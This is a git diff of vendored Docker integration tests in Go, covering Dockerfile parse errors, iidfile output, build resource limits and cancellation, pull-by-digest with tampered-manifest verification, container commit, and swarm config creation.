+  `)).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Dockerfile parse error line 3: unknown instruction: NOINSTRUCTION",
+	})
+}
+
+// FIXME(vdemeester) should be a unit test
+func (s *DockerSuite) TestBuildLineErrorWithEmptyLines(c *check.C) {
+	name := "test_build_line_error_with_empty_lines"
+	cli.Docker(cli.Build(name), build.WithDockerfile(`
+  FROM busybox
+
+  RUN echo hello world
+
+  NOINSTRUCTION echo ba
+
+  CMD ["/bin/init"]
+  `)).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Dockerfile parse error line 6: unknown instruction: NOINSTRUCTION",
+	})
+}
+
+// FIXME(vdemeester) should be a unit test
+func (s *DockerSuite) TestBuildLineErrorWithComments(c *check.C) {
+	name := "test_build_line_error_with_comments"
+	cli.Docker(cli.Build(name), build.WithDockerfile(`FROM busybox
+  # This will print hello world
+  # and then ba
+  RUN echo hello world
+  NOINSTRUCTION echo ba
+  `)).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Dockerfile parse error line 5: unknown instruction: NOINSTRUCTION",
+	})
+}
+
+// #31957
+func (s *DockerSuite) TestBuildSetCommandWithDefinedShell(c *check.C) {
+	buildImageSuccessfully(c, "build1", build.WithDockerfile(`
+FROM busybox
+SHELL ["/bin/sh", "-c"]
+`))
+	buildImageSuccessfully(c, "build2", build.WithDockerfile(`
+FROM build1
+CMD echo foo
+`))
+
+	out, _ := dockerCmd(c, "inspect", "--format", "{{ json .Config.Cmd }}", "build2")
+	c.Assert(strings.TrimSpace(out), checker.Equals, `["/bin/sh","-c","echo foo"]`)
+}
+
+// FIXME(vdemeester) should migrate to docker/cli tests
+func (s *DockerSuite) TestBuildIidFile(c *check.C) {
+	tmpDir, err := ioutil.TempDir("", "TestBuildIidFile")
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer os.RemoveAll(tmpDir)
+	tmpIidFile := filepath.Join(tmpDir, "iid")
+
+	name := "testbuildiidfile"
+	// Use a Dockerfile with multiple stages to ensure we get the last one
+	cli.BuildCmd(c, name,
+		build.WithDockerfile(`FROM `+minimalBaseImage()+` AS stage1
+ENV FOO FOO
+FROM `+minimalBaseImage()+`
+ENV BAR BAZ`),
+		cli.WithFlags("--iidfile", tmpIidFile))
+
+	id, err := ioutil.ReadFile(tmpIidFile)
+	c.Assert(err, check.IsNil)
+	d, err := digest.Parse(string(id))
+	c.Assert(err, check.IsNil)
+	c.Assert(d.String(), checker.Equals, getIDByName(c, name))
+}
+
+// FIXME(vdemeester) should migrate to docker/cli tests
+func (s *DockerSuite) TestBuildIidFileCleanupOnFail(c *check.C) {
+	tmpDir, err := ioutil.TempDir("", "TestBuildIidFileCleanupOnFail")
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer os.RemoveAll(tmpDir)
+	tmpIidFile := filepath.Join(tmpDir, "iid")
+
+	err = ioutil.WriteFile(tmpIidFile, []byte("Dummy"), 0666)
+	c.Assert(err, check.IsNil)
+
+	cli.Docker(cli.Build("testbuildiidfilecleanuponfail"),
+		build.WithDockerfile(`FROM `+minimalBaseImage()+`
+	RUN /non/existing/command`),
+		cli.WithFlags("--iidfile", tmpIidFile)).Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
+	_, err = os.Stat(tmpIidFile)
+	c.Assert(err, check.NotNil)
+	c.Assert(os.IsNotExist(err), check.Equals, true)
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go
index 0205a927dd..8cad28f457 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go
@@ -12,30 +12,33 @@ import (
 	"path/filepath"
 	"regexp"
 	"strings"
+	"syscall"
 	"time"
 
-	"github.com/docker/docker/pkg/integration"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/cli/build"
+	"github.com/docker/docker/internal/test/fakecontext"
 	"github.com/docker/go-units"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
 func (s *DockerSuite) TestBuildResourceConstraintsAreUsed(c *check.C) {
 	testRequires(c, cpuCfsQuota)
 	name := "testbuildresourceconstraints"
+	buildLabel := "DockerSuite.TestBuildResourceConstraintsAreUsed"
 
-	ctx, err := fakeContext(`
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(`
 	FROM hello-world:frozen
 	RUN ["/hello"]
-	`, map[string]string{})
-	c.Assert(err, checker.IsNil)
-
-	_, _, err = dockerCmdInDir(c, ctx.Dir, "build", "--no-cache", "--rm=false", "--memory=64m", "--memory-swap=-1", "--cpuset-cpus=0", "--cpuset-mems=0", "--cpu-shares=100", "--cpu-quota=8000", "--ulimit", "nofile=42", "-t", name, ".")
-	if err != nil {
-		c.Fatal(err)
-	}
+	`))
+	cli.Docker(
+		cli.Args("build", "--no-cache", "--rm=false", "--memory=64m", "--memory-swap=-1", "--cpuset-cpus=0", "--cpuset-mems=0", "--cpu-shares=100", "--cpu-quota=8000", "--ulimit", "nofile=42", "--label="+buildLabel, "-t", name, "."),
+		cli.InDir(ctx.Dir),
+	).Assert(c, icmd.Success)
 
-	out, _ := dockerCmd(c, "ps", "-lq")
+	out := cli.DockerCmd(c, "ps", "-lq", "--filter", "label="+buildLabel).Combined()
 	cID := strings.TrimSpace(out)
 
 	type hostConfig struct {
@@ -51,7 +54,7 @@ func (s *DockerSuite) TestBuildResourceConstraintsAreUsed(c *check.C) {
 	cfg := inspectFieldJSON(c, cID, "HostConfig")
 
 	var c1 hostConfig
-	err = json.Unmarshal([]byte(cfg), &c1)
+	err := json.Unmarshal([]byte(cfg), &c1)
 	c.Assert(err, checker.IsNil, check.Commentf(cfg))
 
 	c.Assert(c1.Memory, checker.Equals, int64(64*1024*1024), check.Commentf("resource constraints not set properly for Memory"))
@@ -64,7 +67,7 @@ func (s *DockerSuite) TestBuildResourceConstraintsAreUsed(c *check.C) {
 	c.Assert(c1.Ulimits[0].Hard, checker.Equals, int64(42), check.Commentf("resource constraints not set properly for Ulimits"))
 
 	// Make sure constraints aren't saved to image
-	dockerCmd(c, "run", "--name=test", name)
+	cli.DockerCmd(c, "run", "--name=test", name)
 
 	cfg = inspectFieldJSON(c, "test", "HostConfig")
 
@@ -85,7 +88,7 @@ func (s *DockerSuite) TestBuildAddChangeOwnership(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	name := "testbuildaddown"
 
-	ctx := func() *FakeContext {
+	ctx := func() *fakecontext.Fake {
 		dockerfile := `
 			FROM busybox
 			ADD foo /bar/
@@ -100,24 +103,20 @@ func (s *DockerSuite) TestBuildAddChangeOwnership(c *check.C) {
 		}
 		defer testFile.Close()
 
-		chownCmd := exec.Command("chown", "daemon:daemon", "foo")
-		chownCmd.Dir = tmpDir
-		out, _, err := runCommandWithOutput(chownCmd)
-		if err != nil {
-			c.Fatal(err, out)
-		}
+		icmd.RunCmd(icmd.Cmd{
+			Command: []string{"chown", "daemon:daemon", "foo"},
+			Dir:     tmpDir,
+		}).Assert(c, icmd.Success)
 
 		if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil {
 			c.Fatalf("failed to open destination dockerfile: %v", err)
 		}
-		return fakeContextFromDir(tmpDir)
+		return fakecontext.New(c, tmpDir)
 	}()
 
 	defer ctx.Close()
 
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatalf("build failed to complete for TestBuildAddChangeOwnership: %v", err)
-	}
+	buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx))
 }
 
 // Test that an infinite sleep during a build is killed if the client disconnects.
@@ -127,8 +126,12 @@ func (s *DockerSuite) TestBuildAddChangeOwnership(c *check.C) {
 // * Run a 1-year-long sleep from a docker build.
 // * When docker events sees container start, close the "docker build" command
 // * Wait for docker events to emit a dying event.
+//
+// TODO(buildkit): this test needs to be rewritten for buildkit.
+// It has been manually tested positive. Confirmed issue: docker build output parsing.
+// Potential issue: newEventObserver uses docker events, which is not hooked up to buildkit.
 func (s *DockerSuite) TestBuildCancellationKillsSleep(c *check.C) {
-	testRequires(c, DaemonIsLinux)
+	testRequires(c, DaemonIsLinux, TODOBuildkit)
 	name := "testbuildcancellation"
 
 	observer, err := newEventObserver(c)
@@ -138,19 +141,23 @@ func (s *DockerSuite) TestBuildCancellationKillsSleep(c *check.C) {
 	defer observer.Stop()
 
 	// (Note: one year, will never finish)
-	ctx, err := fakeContext("FROM busybox\nRUN sleep 31536000", nil)
-	if err != nil {
-		c.Fatal(err)
-	}
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile("FROM busybox\nRUN sleep 31536000"))
 	defer ctx.Close()
 
 	buildCmd := exec.Command(dockerBinary, "build", "-t", name, ".")
 	buildCmd.Dir = ctx.Dir
 
 	stdoutBuild, err := buildCmd.StdoutPipe()
+	c.Assert(err, checker.IsNil)
+
 	if err := buildCmd.Start(); err != nil {
 		c.Fatalf("failed to run build: %s", err)
 	}
+	// always clean up
+	defer func() {
+		buildCmd.Process.Kill()
+		buildCmd.Wait()
+	}()
 
 	matchCID := regexp.MustCompile("Running in (.+)")
 	scanner := bufio.NewScanner(stdoutBuild)
@@ -194,7 +201,7 @@ func (s *DockerSuite) TestBuildCancellationKillsSleep(c *check.C) {
 	}
 
 	// Get the exit status of `docker build`, check it exited because killed.
-	if err := buildCmd.Wait(); err != nil && !integration.IsKilled(err) {
+	if err := buildCmd.Wait(); err != nil && !isKilled(err) {
 		c.Fatalf("wait failed during build run: %T %s", err, err)
 	}
 
@@ -205,3 +212,17 @@ func (s *DockerSuite) TestBuildCancellationKillsSleep(c *check.C) {
 		// ignore, done
 	}
 }
+
+func isKilled(err error) bool {
+	if exitErr, ok := err.(*exec.ExitError); ok {
+		status, ok := exitErr.Sys().(syscall.WaitStatus)
+		if !ok {
+			return false
+		}
+		// status.ExitStatus() is required on Windows because it does not
+		// implement Signal() nor Signaled(). Just check it had a bad exit
+		// status could mean it was killed (and in tests we do kill)
+		return (status.Signaled() && status.Signal() == os.Kill) || status.ExitStatus() != 0
+	}
+	return false
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go
index c2d85461a8..006cf11e1a 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go
@@ -8,13 +8,16 @@ import (
 	"regexp"
 	"strings"
 
-	"github.com/docker/distribution/digest"
 	"github.com/docker/distribution/manifest/schema1"
 	"github.com/docker/distribution/manifest/schema2"
 	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/docker/docker/pkg/stringutils"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/cli/build"
 	"github.com/go-check/check"
+	"github.com/opencontainers/go-digest"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 var (
@@ -31,24 +34,23 @@ func setupImage(c *check.C) (digest.Digest, error) {
 func setupImageWithTag(c *check.C, tag string) (digest.Digest, error) {
 	containerName := "busyboxbydigest"
 
-	dockerCmd(c, "run", "-e", "digest=1", "--name", containerName, "busybox")
+	// new file is committed because this layer is used for detecting malicious
+	// changes. if this was committed as empty layer it would be skipped on pull
+	// and malicious changes would never be detected.
+	cli.DockerCmd(c, "run", "-e", "digest=1", "--name", containerName, "busybox", "touch", "anewfile")
 
 	// tag the image to upload it to the private registry
 	repoAndTag := repoName + ":" + tag
-	out, _, err := dockerCmdWithError("commit", containerName, repoAndTag)
-	c.Assert(err, checker.IsNil, check.Commentf("image tagging failed: %s", out))
+	cli.DockerCmd(c, "commit", containerName, repoAndTag)
 
 	// delete the container as we don't need it any more
-	err = deleteContainer(containerName)
-	c.Assert(err, checker.IsNil)
+	cli.DockerCmd(c, "rm", "-fv", containerName)
 
 	// push the image
-	out, _, err = dockerCmdWithError("push", repoAndTag)
-	c.Assert(err, checker.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out))
+	out := cli.DockerCmd(c, "push", repoAndTag).Combined()
 
 	// delete our local repo that we previously tagged
-	rmiout, _, err := dockerCmdWithError("rmi", repoAndTag)
-	c.Assert(err, checker.IsNil, check.Commentf("error deleting images prior to real test: %s", rmiout))
+	cli.DockerCmd(c, "rmi", repoAndTag)
 
 	matches := pushDigestRegex.FindStringSubmatch(out)
 	c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from push output: %s", out))
@@ -193,10 +195,9 @@ func (s *DockerRegistrySuite) TestBuildByDigest(c *check.C) {
 
 	// do the build
 	name := "buildbydigest"
-	_, err = buildImage(name, fmt.Sprintf(
+	buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(
 		`FROM %s
-     CMD ["/bin/echo", "Hello World"]`, imageReference),
-		true)
+     CMD ["/bin/echo", "Hello World"]`, imageReference)))
 	c.Assert(err, checker.IsNil)
 
 	// get the build's image id
@@ -403,10 +404,12 @@ func (s *DockerRegistrySuite) TestInspectImageWithDigests(c *check.C) {
 	c.Assert(err, checker.IsNil)
 	c.Assert(imageJSON, checker.HasLen, 1)
 	c.Assert(imageJSON[0].RepoDigests, checker.HasLen, 1)
-	c.Assert(stringutils.InSlice(imageJSON[0].RepoDigests, imageReference), checker.Equals, true)
+	assert.Check(c, is.Contains(imageJSON[0].RepoDigests, imageReference))
 }
 
 func (s *DockerRegistrySuite) TestPsListContainersFilterAncestorImageByDigest(c *check.C) {
+	existingContainers := ExistingContainerIDs(c)
+
 	digest, err := setupImage(c)
 	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
 
@@ -417,20 +420,17 @@ func (s *DockerRegistrySuite) TestPsListContainersFilterAncestorImageByDigest(c
 
 	// build an image from it
 	imageName1 := "images_ps_filter_test"
-	_, err = buildImage(imageName1, fmt.Sprintf(
+	buildImageSuccessfully(c, imageName1, build.WithDockerfile(fmt.Sprintf(
 		`FROM %s
-		 LABEL match me 1`, imageReference), true)
-	c.Assert(err, checker.IsNil)
+		 LABEL match me 1`, imageReference)))
 
 	// run a container based on that
 	dockerCmd(c, "run", "--name=test1", imageReference, "echo", "hello")
-	expectedID, err := getIDByName("test1")
-	c.Assert(err, check.IsNil)
+	expectedID := getIDByName(c, "test1")
 
 	// run a container based on the a descendant of that too
 	dockerCmd(c, "run", "--name=test2", imageName1, "echo", "hello")
-	expectedID1, err := getIDByName("test2")
-	c.Assert(err, check.IsNil)
+	expectedID1 := getIDByName(c, "test2")
 
 	expectedIDs := []string{expectedID, expectedID1}
 
@@ -441,7 +441,7 @@ func (s *DockerRegistrySuite) TestPsListContainersFilterAncestorImageByDigest(c
 
 	// Valid imageReference
 	out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=ancestor="+imageReference)
-	checkPsAncestorFilterOutput(c, out, imageReference, expectedIDs)
+	checkPsAncestorFilterOutput(c, RemoveOutputForExistingElements(out, existingContainers), imageReference, expectedIDs)
 }
 
 func (s *DockerRegistrySuite) TestDeleteImageByIDOnlyPulledByDigest(c *check.C) {
@@ -533,7 +533,7 @@ func (s *DockerRegistrySuite) TestPullFailsWithAlteredManifest(c *check.C) {
 	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
 
 	// Load the target manifest blob.
-	manifestBlob := s.reg.readBlobContents(c, manifestDigest)
+	manifestBlob := s.reg.ReadBlobContents(c, manifestDigest)
 
 	var imgManifest schema2.Manifest
 	err = json.Unmarshal(manifestBlob, &imgManifest)
@@ -544,13 +544,13 @@ func (s *DockerRegistrySuite) TestPullFailsWithAlteredManifest(c *check.C) {
 
 	// Move the existing data file aside, so that we can replace it with a
 	// malicious blob of data. NOTE: we defer the returned undo func.
-	undo := s.reg.tempMoveBlobData(c, manifestDigest)
+	undo := s.reg.TempMoveBlobData(c, manifestDigest)
 	defer undo()
 
 	alteredManifestBlob, err := json.MarshalIndent(imgManifest, "", "   ")
 	c.Assert(err, checker.IsNil, check.Commentf("unable to encode altered image manifest to JSON"))
 
-	s.reg.writeBlobContents(c, manifestDigest, alteredManifestBlob)
+	s.reg.WriteBlobContents(c, manifestDigest, alteredManifestBlob)
 
 	// Now try pulling that image by digest. We should get an error about
 	// digest verification for the manifest digest.
@@ -573,7 +573,7 @@ func (s *DockerSchema1RegistrySuite) TestPullFailsWithAlteredManifest(c *check.C
 	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
 
 	// Load the target manifest blob.
-	manifestBlob := s.reg.readBlobContents(c, manifestDigest)
+	manifestBlob := s.reg.ReadBlobContents(c, manifestDigest)
 
 	var imgManifest schema1.Manifest
 	err = json.Unmarshal(manifestBlob, &imgManifest)
@@ -586,13 +586,13 @@ func (s *DockerSchema1RegistrySuite) TestPullFailsWithAlteredManifest(c *check.C
 
 	// Move the existing data file aside, so that we can replace it with a
 	// malicious blob of data. NOTE: we defer the returned undo func.
-	undo := s.reg.tempMoveBlobData(c, manifestDigest)
+	undo := s.reg.TempMoveBlobData(c, manifestDigest)
 	defer undo()
 
 	alteredManifestBlob, err := json.MarshalIndent(imgManifest, "", "   ")
 	c.Assert(err, checker.IsNil, check.Commentf("unable to encode altered image manifest to JSON"))
 
-	s.reg.writeBlobContents(c, manifestDigest, alteredManifestBlob)
+	s.reg.WriteBlobContents(c, manifestDigest, alteredManifestBlob)
 
 	// Now try pulling that image by digest. We should get an error about
 	// digest verification for the manifest digest.
@@ -615,7 +615,7 @@ func (s *DockerRegistrySuite) TestPullFailsWithAlteredLayer(c *check.C) {
 	c.Assert(err, checker.IsNil)
 
 	// Load the target manifest blob.
-	manifestBlob := s.reg.readBlobContents(c, manifestDigest)
+	manifestBlob := s.reg.ReadBlobContents(c, manifestDigest)
 
 	var imgManifest schema2.Manifest
 	err = json.Unmarshal(manifestBlob, &imgManifest)
@@ -626,17 +626,17 @@ func (s *DockerRegistrySuite) TestPullFailsWithAlteredLayer(c *check.C) {
 
 	// Move the existing data file aside, so that we can replace it with a
 	// malicious blob of data. NOTE: we defer the returned undo func.
-	undo := s.reg.tempMoveBlobData(c, targetLayerDigest)
+	undo := s.reg.TempMoveBlobData(c, targetLayerDigest)
 	defer undo()
 
 	// Now make a fake data blob in this directory.
-	s.reg.writeBlobContents(c, targetLayerDigest, []byte("This is not the data you are looking for."))
+	s.reg.WriteBlobContents(c, targetLayerDigest, []byte("This is not the data you are looking for."))
 
 	// Now try pulling that image by digest. We should get an error about
 	// digest verification for the target layer digest.
 
 	// Remove distribution cache to force a re-pull of the blobs
-	if err := os.RemoveAll(filepath.Join(dockerBasePath, "image", s.d.storageDriver, "distribution")); err != nil {
+	if err := os.RemoveAll(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "image", s.d.StorageDriver(), "distribution")); err != nil {
 		c.Fatalf("error clearing distribution cache: %v", err)
 	}
 
@@ -658,7 +658,7 @@ func (s *DockerSchema1RegistrySuite) TestPullFailsWithAlteredLayer(c *check.C) {
 	c.Assert(err, checker.IsNil)
 
 	// Load the target manifest blob.
-	manifestBlob := s.reg.readBlobContents(c, manifestDigest)
+	manifestBlob := s.reg.ReadBlobContents(c, manifestDigest)
 
 	var imgManifest schema1.Manifest
 	err = json.Unmarshal(manifestBlob, &imgManifest)
@@ -669,17 +669,17 @@ func (s *DockerSchema1RegistrySuite) TestPullFailsWithAlteredLayer(c *check.C) {
 
 	// Move the existing data file aside, so that we can replace it with a
 	// malicious blob of data. NOTE: we defer the returned undo func.
-	undo := s.reg.tempMoveBlobData(c, targetLayerDigest)
+	undo := s.reg.TempMoveBlobData(c, targetLayerDigest)
 	defer undo()
 
 	// Now make a fake data blob in this directory.
-	s.reg.writeBlobContents(c, targetLayerDigest, []byte("This is not the data you are looking for."))
+	s.reg.WriteBlobContents(c, targetLayerDigest, []byte("This is not the data you are looking for."))
 
 	// Now try pulling that image by digest. We should get an error about
 	// digest verification for the target layer digest.
 
 	// Remove distribution cache to force a re-pull of the blobs
-	if err := os.RemoveAll(filepath.Join(dockerBasePath, "image", s.d.storageDriver, "distribution")); err != nil {
+	if err := os.RemoveAll(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "image", s.d.StorageDriver(), "distribution")); err != nil {
 		c.Fatalf("error clearing distribution cache: %v", err)
 	}
 
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go
index 8008ae1716..79c5f73156 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go
@@ -3,22 +3,24 @@ package main
 import (
 	"strings"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
 	"github.com/go-check/check"
 )
 
 func (s *DockerSuite) TestCommitAfterContainerIsDone(c *check.C) {
-	out, _ := dockerCmd(c, "run", "-i", "-a", "stdin", "busybox", "echo", "foo")
+	out := cli.DockerCmd(c, "run", "-i", "-a", "stdin", "busybox", "echo", "foo").Combined()
 
 	cleanedContainerID := strings.TrimSpace(out)
 
-	dockerCmd(c, "wait", cleanedContainerID)
+	cli.DockerCmd(c, "wait", cleanedContainerID)
 
-	out, _ = dockerCmd(c, "commit", cleanedContainerID)
+	out = cli.DockerCmd(c, "commit", cleanedContainerID).Combined()
 
 	cleanedImageID := strings.TrimSpace(out)
 
-	dockerCmd(c, "inspect", cleanedImageID)
+	cli.DockerCmd(c, "inspect", cleanedImageID)
 }
 
 func (s *DockerSuite) TestCommitWithoutPause(c *check.C) {
@@ -39,7 +41,6 @@ func (s *DockerSuite) TestCommitWithoutPause(c *check.C) {
 //test commit a paused container should not unpause it after commit
 func (s *DockerSuite) TestCommitPausedContainer(c *check.C) {
 	testRequires(c, DaemonIsLinux)
-	defer unpauseAllContainers()
 	out, _ := dockerCmd(c, "run", "-i", "-d", "busybox")
 
 	cleanedContainerID := strings.TrimSpace(out)
@@ -54,9 +55,9 @@ func (s *DockerSuite) TestCommitPausedContainer(c *check.C) {
 }
 
 func (s *DockerSuite) TestCommitNewFile(c *check.C) {
-	dockerCmd(c, "run", "--name", "commiter", "busybox", "/bin/sh", "-c", "echo koye > /foo")
+	dockerCmd(c, "run", "--name", "committer", "busybox", "/bin/sh", "-c", "echo koye > /foo")
 
-	imageID, _ := dockerCmd(c, "commit", "commiter")
+	imageID, _ := dockerCmd(c, "commit", "committer")
 	imageID = strings.TrimSpace(imageID)
 
 	out, _ := dockerCmd(c, "run", imageID, "cat", "/foo")
@@ -76,7 +77,7 @@ func (s *DockerSuite) TestCommitHardlink(c *check.C) {
 	imageID, _ := dockerCmd(c, "commit", "hardlinks", "hardlinks")
 	imageID = strings.TrimSpace(imageID)
 
-	secondOutput, _ := dockerCmd(c, "run", "-t", "hardlinks", "ls", "-di", "file1", "file2")
+	secondOutput, _ := dockerCmd(c, "run", "-t", imageID, "ls", "-di", "file1", "file2")
 
 	chunks = strings.Split(strings.TrimSpace(secondOutput), " ")
 	inode = chunks[0]
@@ -90,7 +91,7 @@ func (s *DockerSuite) TestCommitTTY(c *check.C) {
 	imageID, _ := dockerCmd(c, "commit", "tty", "ttytest")
 	imageID = strings.TrimSpace(imageID)
 
-	dockerCmd(c, "run", "ttytest", "/bin/ls")
+	dockerCmd(c, "run", imageID, "/bin/ls")
 }
 
 func (s *DockerSuite) TestCommitWithHostBindMount(c *check.C) {
@@ -100,7 +101,7 @@ func (s *DockerSuite) TestCommitWithHostBindMount(c *check.C) {
 	imageID, _ := dockerCmd(c, "commit", "bind-commit", "bindtest")
 	imageID = strings.TrimSpace(imageID)
 
-	dockerCmd(c, "run", "bindtest", "true")
+	dockerCmd(c, "run", imageID, "true")
 }
 
 func (s *DockerSuite) TestCommitChange(c *check.C) {
@@ -121,11 +122,21 @@ func (s *DockerSuite) TestCommitChange(c *check.C) {
 		"test", "test-commit")
 	imageID = strings.TrimSpace(imageID)
 
+	expectedEnv := "[DEBUG=true test=1 PATH=/foo]"
+	// bug fixed in 1.36, add min APi >= 1.36 requirement
+	// PR record https://github.com/moby/moby/pull/35582
+	if versions.GreaterThan(testEnv.DaemonAPIVersion(), "1.35") && testEnv.OSType != "windows" {
+		// The ordering here is due to `PATH` being overridden from the container's
+		// ENV.  On windows, the container doesn't have a `PATH` ENV variable so
+		// the ordering is the same as the cli.
+		expectedEnv = "[PATH=/foo DEBUG=true test=1]"
+	}
+
 	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
-	prefix = strings.ToUpper(prefix) // Force C: as that's how WORKDIR is normalised on Windows
+	prefix = strings.ToUpper(prefix) // Force C: as that's how WORKDIR is normalized on Windows
 	expected := map[string]string{
 		"Config.ExposedPorts": "map[8080/tcp:{}]",
-		"Config.Env":          "[DEBUG=true test=1 PATH=/foo]",
+		"Config.Env":          expectedEnv,
 		"Config.Labels":       "map[foo:bar]",
 		"Config.Cmd":          "[/bin/sh]",
 		"Config.WorkingDir":   prefix + slash + "opt",
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_config_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_config_create_test.go
new file mode 100644
index 0000000000..b823254874
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_config_create_test.go
@@ -0,0 +1,131 @@
+// +build !windows
+
+package main
+
+import (
+	"io/ioutil"
+	"os"
+	"strings"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSwarmSuite) TestConfigCreate(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	testName := "test_config"
+	id := d.CreateConfig(c, swarm.ConfigSpec{
+		Annotations: swarm.Annotations{
+			Name: testName,
+		},
+		Data: []byte("TESTINGDATA"),
+	})
+	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id))
+
+	config := d.GetConfig(c, id)
+	c.Assert(config.Spec.Name, checker.Equals, testName)
+}
+
+func (s *DockerSwarmSuite) TestConfigCreateWithLabels(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	testName := "test_config"
+	id := d.CreateConfig(c, swarm.ConfigSpec{
+		Annotations: swarm.Annotations{
+			Name: testName,
+			Labels: map[string]string{
+				"key1": "value1",
+				"key2": "value2",
+			},
+		},
+		Data: []byte("TESTINGDATA"),
+	})
+	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id))
+
+	config := d.GetConfig(c, id)
+	c.Assert(config.Spec.Name, checker.Equals, testName)
+	c.Assert(len(config.Spec.Labels), checker.Equals, 2)
+	c.Assert(config.Spec.Labels["key1"], checker.Equals, "value1")
+	c.Assert(config.Spec.Labels["key2"], checker.Equals, "value2")
+}
+
+// Test case for 28884
+func (s *DockerSwarmSuite) TestConfigCreateResolve(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	name := "test_config"
+	id := d.CreateConfig(c, swarm.ConfigSpec{
+		Annotations: swarm.Annotations{
+			Name: name,
+		},
+		Data: []byte("foo"),
+	})
+	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id))
+
+	fake := d.CreateConfig(c, swarm.ConfigSpec{
+		Annotations: swarm.Annotations{
+			Name: id,
+		},
+		Data: []byte("fake foo"),
+	})
+	c.Assert(fake, checker.Not(checker.Equals), "", check.Commentf("configs: %s", fake))
+
+	out, err := d.Cmd("config", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, name)
+	c.Assert(out, checker.Contains, fake)
+
+	out, err = d.Cmd("config", "rm", id)
+	c.Assert(out, checker.Contains, id)
+
+	// Fake one will remain
+	out, err = d.Cmd("config", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), name)
+	c.Assert(out, checker.Contains, fake)
+
+	// Remove based on name prefix of the fake one
+	// (which is the same as the ID of foo one) should not work
+	// as search is only done based on:
+	// - Full ID
+	// - Full Name
+	// - Partial ID (prefix)
+	out, err = d.Cmd("config", "rm", id[:5])
+	c.Assert(out, checker.Not(checker.Contains), id)
+	out, err = d.Cmd("config", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), name)
+	c.Assert(out, checker.Contains, fake)
+
+	// Remove based on ID prefix of the fake one should succeed
+	out, err = d.Cmd("config", "rm", fake[:5])
+	c.Assert(out, checker.Contains, fake[:5])
+	out, err = d.Cmd("config", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), name)
+	c.Assert(out, checker.Not(checker.Contains), id)
+	c.Assert(out, checker.Not(checker.Contains), fake)
+}
+
+func (s *DockerSwarmSuite) TestConfigCreateWithFile(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	testFile, err := ioutil.TempFile("", "configCreateTest")
+	c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file"))
+	defer os.Remove(testFile.Name())
+
+	testData := "TESTINGDATA"
+	_, err = testFile.Write([]byte(testData))
+	c.Assert(err, checker.IsNil, check.Commentf("failed to write to temporary file"))
+
+	testName := "test_config"
+	out, err := d.Cmd("config", "create", testName, testFile.Name())
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "", check.Commentf(out))
+
